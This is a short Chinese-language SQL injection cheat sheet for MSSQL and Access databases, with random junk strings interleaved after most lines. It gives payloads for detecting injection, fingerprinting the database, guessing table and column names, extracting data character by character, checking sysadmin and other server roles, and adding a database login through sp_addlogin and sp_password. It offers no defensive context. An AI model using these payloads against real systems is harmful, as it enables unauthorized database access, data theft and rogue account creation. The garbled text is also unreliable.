1.判断是否有注入;and 1=1 ;and 1=2 8zrLl:{
2.初步判断是否是mssql ;and user>0 L(q~%
Ve[[J"ze
3.注入参数是字符'and [查询条件] and ''=' r:U/a=V
MWI7u7{
4.搜索时没过滤参数的'and [查询条件] and '%25'=' aXgngwq
pn p)- a*7
5.判断数据库系统 ZkmYpi[
*q*$%H
;and (select count(*) from sysobjects)>0 mssql eE5j6`5i
h1+y.4
;and (select count(*) from msysobjects)>0 access NRMEZ\*L
+GL[uxe"
#:xv]qb`k
Zo#c[9IaC
6.猜数据库 ;and (select Count(*) from [数据库名])>0 |.?Xov]
D zdKBJT +
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 K)#6&\0tT
%cl{J_}{&
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 6){nu rDBG
,FK.8c 6g
9.(1)猜字段的ascii值(access) <AN5>:k[pM
Sv\399(
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 )ml#2XP!f
T_ga?G<
(2)猜字段的ascii值(mssql) >Q2kXwN
34I;DUdcE
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 gv7@4G
"]}?{2i;
10.测试权限结构(mssql) CE7{>pl
3XIL; 5
Gg y7xb
5"&=BD~D
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- .\7AJB\l
~BC~^D&WD
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 2.
f8uq
W=I~GhM
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ]Q -.Y-J/O
z,g\7F[
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- >rY^Un{Z
|w.h97fj
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- l}~9xa}:D|
42=/$V
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- oC}2 Z{
L}VQc9"gc
;and 1=(select IS_MEMBER('db_owner'));-- ^+O97<#6C
B=HEi\55K
A2''v3-h8
59H~qE1Md
11.添加mssql和系统的帐户 &F.L*M
oA+'9/UY
;exec master.dbo.sp_addlogin username;-- Ki dbcZ
;exec master.dbo.sp_password null,username,password;-- 6E$ET5p&